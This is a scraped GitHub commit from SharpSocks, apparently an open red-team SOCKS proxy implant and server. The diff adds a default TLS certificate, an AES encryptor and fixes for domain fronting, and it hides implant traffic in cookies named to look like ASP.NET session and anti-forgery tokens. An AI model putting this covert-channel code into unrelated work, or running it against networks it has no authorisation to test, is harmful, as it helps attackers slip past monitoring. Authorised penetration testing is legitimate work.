TLS and Domain Fronting

[+] Added: TLS by default, a self signed cert has added. If one is NOT Specified this one will be used. A X509Certificate2 can be passed via the PSSocksServer.CreateSocksController Method [+] Fixed: Domain Fronting now works as expected, corrected a bug which meant that the payload wasn't being sent correctly for the fronted host [+] Fixed: Authenticated Proxy out via the implant should now work correctly
nettitude · Jul 16, 2018 · 5742e3d · 5742e3d
1 parent 805b153
commit 5742e3d
Show file tree

Hide file tree

Showing 24 changed files with 905 additions and 136 deletions.
diff --git a/.gitignore b/.gitignore
@@ -24,6 +24,9 @@ bld/
 [Oo]bj/
 [Ll]og/
 
+#Self Signed Certificate directory
+cert/
+
 # Visual Studio 2015 cache/options directory
 .vs/
 # Uncomment if you have tasks that create the project's static files in wwwroot

diff --git a/Binaries/SharpSocksImplantDLL/SharpSocksImplant.dll b/Binaries/SharpSocksImplantDLL/SharpSocksImplant.dll
diff --git a/Binaries/SharpSocksImplantTestApp/SharpSocksImplant.dll b/Binaries/SharpSocksImplantTestApp/SharpSocksImplant.dll
diff --git a/Binaries/SharpSocksImplantTestApp/SharpSocksImplantTestApp.exe b/Binaries/SharpSocksImplantTestApp/SharpSocksImplantTestApp.exe
diff --git a/Binaries/SharpSocksServerDLL/SharpSocksServer.dll b/Binaries/SharpSocksServerDLL/SharpSocksServer.dll
diff --git a/Binaries/SharpSocksServerTestApp/SharpSocksServer.dll b/Binaries/SharpSocksServerTestApp/SharpSocksServer.dll
diff --git a/Binaries/SharpSocksServerTestApp/SharpSocksServerTestApp.exe b/Binaries/SharpSocksServerTestApp/SharpSocksServerTestApp.exe
diff --git a/SharpSocks.ps1 b/SharpSocks.ps1
diff --git a/...ocksImplant/ImplantSide/Classes/Common/Encryption/SimpleEncryptor/DebugSimpleEncryptor.cs b/...ocksImplant/ImplantSide/Classes/Common/Encryption/SimpleEncryptor/DebugSimpleEncryptor.cs
@@ -0,0 +1,87 @@
+using Common.Classes.Encryption;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Security;
+
+namespace Common.Encryption.SimpleEncryptor
+{
+
+    /// <summary>
+    /// This is a simple encryptor 
+    /// </summary>
+    public class DebugSimpleEncryptor : IEncryptionHelper
+    {
+        List<byte> _key = new List<byte>();
+
+        public DebugSimpleEncryptor(String base64Key)
+        {
+            byte[] key = Convert.FromBase64String(base64Key);
+            System.Security.Cryptography.ProtectedMemory.Protect(key, System.Security.Cryptography.MemoryProtectionScope.SameProcess);
+            _key.AddRange(key);
+            Array.Clear(key, 0, key.Length);
+        }
+
+        public DebugSimpleEncryptor(SecureString base64Key)
+        {
+            IntPtr valuePtr = IntPtr.Zero;
+            try
+            {
+                valuePtr = Marshal.SecureStringToGlobalAllocUnicode(base64Key);
+                var key = Convert.FromBase64String(Marshal.PtrToStringUni(valuePtr));
+                System.Security.Cryptography.ProtectedMemory.Protect(key, System.Security.Cryptography.MemoryProtectionScope.SameProcess);
+                _key.AddRange(key);
+                Array.Clear(key, 0, key.Length);
+            }
+            finally
+            {
+                Marshal.ZeroFreeGlobalAllocUnicode(valuePtr);
+            }
+        }
+
+        public List<byte> Decrypt(string encodedEncPayload)
+        {
+            var ciphrBytes = Convert.FromBase64String(encodedEncPayload).ToList();
+            using (var aes = new System.Security.Cryptography.RijndaelManaged())
+            {
+                aes.Mode = System.Security.Cryptography.CipherMode.CBC;
+                aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
+                aes.IV = ciphrBytes.Take(16).ToArray();
+                var key = _key.ToArray();
+                System.Security.Cryptography.ProtectedMemory.Unprotect(key, System.Security.Cryptography.MemoryProtectionScope.SameProcess);
+                aes.Key = key;
+                var dec = aes.CreateDecryptor();
+                var encBytes = ciphrBytes.Skip(16).ToArray();
+                var plainbytes = dec.TransformFinalBlock(encBytes, 0, encBytes.Length).ToList();
+                Array.Clear(key, 0, key.Length);
+                return plainbytes;
+            }   
+        }
+
+        public string Encrypt(List<byte> payload)
+        {
+            using (var aes = new System.Security.Cryptography.RijndaelManaged())
+            {
+                var result = new List<byte>();
+                aes.Mode = System.Security.Cryptography.CipherMode.CBC;
+                aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
+                aes.GenerateIV();
+                var key = _key.ToArray();
+                System.Security.Cryptography.ProtectedMemory.Unprotect(key, System.Security.Cryptography.MemoryProtectionScope.SameProcess);
+                aes.Key = key;
+                var enc = aes.CreateEncryptor();
+                result.AddRange(aes.IV);
+                result.AddRange(enc.TransformFinalBlock(payload.ToArray(), 0, payload.Count));
+                Array.Clear(key, 0, key.Length);
+                return System.Convert.ToBase64String(result.ToArray());
+            }
+        }
+
+        public string Initialize()
+        {
+            //NO WORK TO DO IN THIS VERSION
+            return "USING DEBUG SIMPLE ENCRYPTOR";
+        }
+    }
+}
diff --git a/SharpSocksImplant/ImplantSide/Classes/Comms/CommandCommunicationHandler.cs b/SharpSocksImplant/ImplantSide/Classes/Comms/CommandCommunicationHandler.cs
@@ -55,7 +55,9 @@ public List<byte> Send(String sessionPayload, String status, List<byte> payload)
                     wc.Proxy = HttpWebRequest.GetSystemWebProxy();
                 else 
                     wc.Proxy = _config.WebProxy;
-            cookies.Add(new Cookie($"{_config.SessionCookieName}", $"{encryptedSessionPayload}") { Domain = _config.URL.Host });
+            wc.Headers.Add("Host", _config.HostHeader);
+
+            cookies.Add(new Cookie($"{_config.SessionCookieName}", $"{encryptedSessionPayload}") { Domain = (!String.IsNullOrWhiteSpace(_config.HostHeader)) ? _config.HostHeader.Split(':')[0] : _config.URL.Host });
 
             string encPayload = null;
             if (null != payload && payload.Count > 0)
@@ -93,8 +95,16 @@ public List<byte> Send(String sessionPayload, String status, List<byte> payload)
                         response = wc.UploadString(BuildServerURI(), encPayload);
                     else
                     {
+                        if (wc.Headers.AllKeys.Contains("Host"))
+                        {
+                            if (wc.Headers["Host"] != _config.HostHeader)
+                                wc.Headers["Host"] = _config.HostHeader;
+                        }
+                        else
+                            wc.Headers.Add("Host", _config.HostHeader);
                         if (payload != null && payload.Count() > 0)
-                            cookies.Add(new Cookie($"{_config.PayloadCookieName}", $"{encPayload}") { Domain = _config.URL.Host });
+                            cookies.Add(new Cookie($"{_config.PayloadCookieName}", $"{encPayload}") { Domain = (!String.IsNullOrWhiteSpace(_config.HostHeader)) ? _config.HostHeader.Split(':')[0] : _config.URL.Host });
+
 
                         response = wc.DownloadString(BuildServerURI());
                     }

diff --git a/SharpSocksImplant/ImplantSide/Classes/Extensions/WebClientEx.cs b/SharpSocksImplant/ImplantSide/Classes/Extensions/WebClientEx.cs
@@ -63,10 +63,7 @@ protected override WebRequest GetWebRequest(Uri address)
 
             ((HttpWebRequest)r).AllowAutoRedirect = AutoRedirect;
             ((HttpWebRequest)r).ServicePoint.Expect100Continue = false;
-
-            if(!String.IsNullOrWhiteSpace(frontingDomain))
-                ((HttpWebRequest)r).Headers["Host"] = frontingDomain;
-
+
             ((HttpWebRequest)r).UserAgent = UserAgent;
 
             var request = r as HttpWebRequest;

diff --git a/SharpSocksImplant/ImplantSide/Classes/Integration/PoshCreateProxy.cs b/SharpSocksImplant/ImplantSide/Classes/Integration/PoshCreateProxy.cs
@@ -1,4 +1,4 @@
-using Common.Encryption.Debug;
+using Common.Encryption.SimpleEncryptor;
 using ImplantSide.Classes;
 using ImplantSide.Classes.Socks;
 using ImplantSide.Interfaces;
@@ -26,6 +26,7 @@ public static SocksController CreateSocksController(Uri serverUri, String comman
                 UserAgent = userAgent,
                 CommandServerUI = serverUri,
                 UseProxy = (null != wbProxy),
+                WebProxy = wbProxy,
                 URLPaths = urlPaths,
                 ImplantComms = icomms,
                 HostHeader  = HostHeader,

diff --git a/SharpSocksImplant/ImplantSide/SharpSocksImplant.csproj b/SharpSocksImplant/ImplantSide/SharpSocksImplant.csproj
@@ -42,7 +42,7 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
-    <Compile Include="Classes\Common\Encryption\Debug\DebugSimpleEncryptor.cs" />
+    <Compile Include="Classes\Common\Encryption\SimpleEncryptor\DebugSimpleEncryptor.cs" />
     <Compile Include="Classes\Common\Encryption\EncryptionHelper.cs" />
     <Compile Include="Classes\Common\Encryption\IEncryptionHelper.cs" />
     <Compile Include="Classes\Common\Host\IPv4Tools.cs" />

diff --git a/SharpSocksImplant/ImplantTestApp/Program.cs b/SharpSocksImplant/ImplantTestApp/Program.cs
@@ -28,12 +28,13 @@ static void Main(string[] args)
             String key = null;
             short beaconTime = 0;
             bool useProxy = false;
+            bool userDefinedProxy = false;
             var errors = new List<String>();
             var warnings = new List<String>();
 
             var p = new OptionSet() {
                 { "use-proxy","Use proxy server (for system proxy set this and leave -m blank)" , v => useProxy = v != null },
-                { "m=|proxy=", "Proxy Url in format http://<server>:<port> (-p is implied)", v => proxyUrl = v},
+                { "m=|proxy=", "Proxy Url in format http://<server>:<port> (use-proxy is implied)", v => proxyUrl = v},
                 { "u=|username=", "Web proxy username ", v => username = v},
                 { "d=|domain=", "Web proxy domain ", v => domain = v},
                 { "p=|password=", "Web proxy password ", v => password = v},
@@ -99,13 +100,13 @@ static void Main(string[] args)
                         else
                             cred = new NetworkCredential(username, secPassword);
 
-                        wbProxy = new WebProxy(proxyUri, true, new List<String>().ToArray(), cred);
+                        wbProxy = new WebProxy(proxyUri, false, new List<String>().ToArray(), cred);
 
                     }
                     else
-                        wbProxy = new WebProxy(proxyUri, true, new List<String>().ToArray());
+                        wbProxy = new WebProxy(proxyUri, false, new List<String>().ToArray());
 
-                    useProxy = true;
+                    userDefinedProxy = useProxy = true;
                 }
             }
 
@@ -131,7 +132,16 @@ static void Main(string[] args)
                 foreach (var n in key) secKey.AppendChar(n);
             }
 
-            var sock = PoshCreateProxy.CreateSocksController(parsedServerUri, commandChannelId, dfHost, userAgent ?? "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36", secKey, new List<String> {"Upload" }, sessionCookieName ?? "ASP.NET_SessionId", payloadCookieName ?? "__RequestVerificationToken", System.Net.HttpWebRequest.GetSystemWebProxy(), 5000, null);
+            var sock = PoshCreateProxy.CreateSocksController(parsedServerUri, 
+                                                            commandChannelId, 
+                                                            dfHost, 
+                                                            userAgent ?? "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36", 
+                                                            secKey, 
+                                                            new List<String> {"Upload" }, 
+                                                            sessionCookieName ?? "ASP.NET_SessionId", payloadCookieName ?? "__RequestVerificationToken", 
+                                                            (useProxy) ? ((userDefinedProxy) ? wbProxy : System.Net.HttpWebRequest.GetSystemWebProxy()) : null, 
+                                                            5000, 
+                                                            null);
 
             Console.WriteLine("Ready to start cmd loop?");
             Console.ReadLine();

diff --git a/SharpSocksServer/SharpSocksServer/Resources/host2cert.pfx.cmp b/SharpSocksServer/SharpSocksServer/Resources/host2cert.pfx.cmp
diff --git a/SharpSocksServer/SharpSocksServer/SharpSocks.Designer.cs b/SharpSocksServer/SharpSocksServer/SharpSocks.Designer.cs
-Original file line number
+Diff line change
@@ Expand Up / @@ -24,6 +24,9 @@ bld/ @@
     [Oo]bj/
     [Ll]og/
+    #Self Signed Certificate directory
+    cert/
     # Visual Studio 2015 cache/options directory
     .vs/
     # Uncomment if you have tasks that create the project's static files in wwwroot
@@ Expand Down @@